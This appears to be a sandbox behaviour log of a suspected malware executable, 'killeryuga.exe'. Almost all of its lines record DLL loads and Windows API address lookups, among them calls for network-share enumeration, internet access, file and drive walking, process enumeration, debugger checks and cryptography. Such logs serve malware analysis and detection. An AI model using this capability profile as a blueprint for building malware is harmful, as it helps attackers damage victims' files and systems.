Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CopyEnhMetaFileW, address_out = 0x76acd9dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = Chord, address_out = 0x76ac439f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = PlayMetaFile, address_out = 0x76aab2b9 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75bd0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgID, address_out = 0x75bf503c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleUninitialize, address_out = 0x75beeba1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleSetMenuDescriptor, address_out = 0x75c2dc53 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleLoadFromStream, address_out = 0x75bd6143 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = OleQueryCreateFromData, address_out = 0x75c532d4 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x75e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetPathFromIDListA, address_out = 0x75f51c24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75e43c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetInstanceExplorer, address_out = 0x75e76399 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76078af2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = DragAcceptFiles, address_out = 0x75f51bf1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowsHookW, address_out = 0x754c8ca2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetMessageQueue, address_out = 0x7549c8e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSysColor, address_out = 0x75486c3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BroadcastSystemMessageW, address_out = 0x754cc140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = OpenDesktopA, address_out = 0x7549011a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetCapture, address_out = 0x754aed56 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x75490b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefDlgProcW, address_out = 0x77634100 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DdeUnaccessData, address_out = 0x754d82f4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClassInfoExW, address_out = 0x7548b238 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetScrollBarInfo, address_out = 0x75493ff8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x75493e75 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 05:38:48 (UTC) True 1
Fn
System Get Time type = Ticks, time = 84412 True 1
Fn
System Get Time type = Performance Ctr, time = 12804540292 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75364f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75361252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75364208 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7536359f True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
System Get Info type = Hardware Information True 249
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtect, address_out = 0x7536435f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = RPCRT4.dll, base_address = 0x759b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\rpcrt4.dll, function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Module Load module_name = MPR.dll, base_address = 0x750f0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetEnumResourceW, address_out = 0x750f3058 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetOpenEnumW, address_out = 0x750f2f06 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\mpr.dll, function = WNetCloseEnum, address_out = 0x750f2dd6 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75d30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x750b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x750b26e0 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x77020000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAppendW, address_out = 0x770381ef True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75350000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75361b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x7536186e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x75361282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x75361986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x753610ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x7538830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7537d802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x75361700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x753611c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x753611a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x75361856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x7536183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7538896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x7538828e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x75361410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75362d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x75365558 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersion, address_out = 0x75364467 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x753634d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x7536110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x75363587 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x753614fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x753611e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x753649ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75361916 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x753687c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x7538772f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x753651cb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x753651e3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x75361725 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x7536465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x753658a6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x75361946 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x75364d40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77603002 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesW, address_out = 0x753e425f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x7536495d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatW, address_out = 0x753834d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatW, address_out = 0x7537f481 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringW, address_out = 0x75363bca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x753617b9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleCP, address_out = 0x75407bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetConsoleMode, address_out = 0x75361328 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x753634c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77611f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x7538d1c3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetStdHandle, address_out = 0x753e454f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEnvironmentVariableA, address_out = 0x7536e331 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x753614c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x775fe026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x775f22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x775f2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x753651b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileType, address_out = 0x75363531 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x75364a6f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x75387aca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x7538d1d4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleCtrlHandler, address_out = 0x75368a09 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FatalAppExitA, address_out = 0x753e4691 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x776045f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x753e40d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75367a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x753614e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x75361450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x753617ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x75365189 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7538d1a1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EncodePointer, address_out = 0x77610fcb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77609d35 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75364a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75365235 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x75364493 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x753654ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x7536dd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x7536179c True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x75470000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x75488a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x75491341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x75489a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x754878e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x75489abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x754888f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x75491361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x75487809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x7548b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x75490dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsWindow, address_out = 0x75487136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x75489679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x75493559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x776025dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x754dfd1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x754905ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostThreadMessageW, address_out = 0x75488bff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxW, address_out = 0x754dfd3f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x7548787b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x76f50000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetHashParam, address_out = 0x76f5df7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CloseServiceHandle, address_out = 0x76f6369c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x76f5df14 True 1
Fn
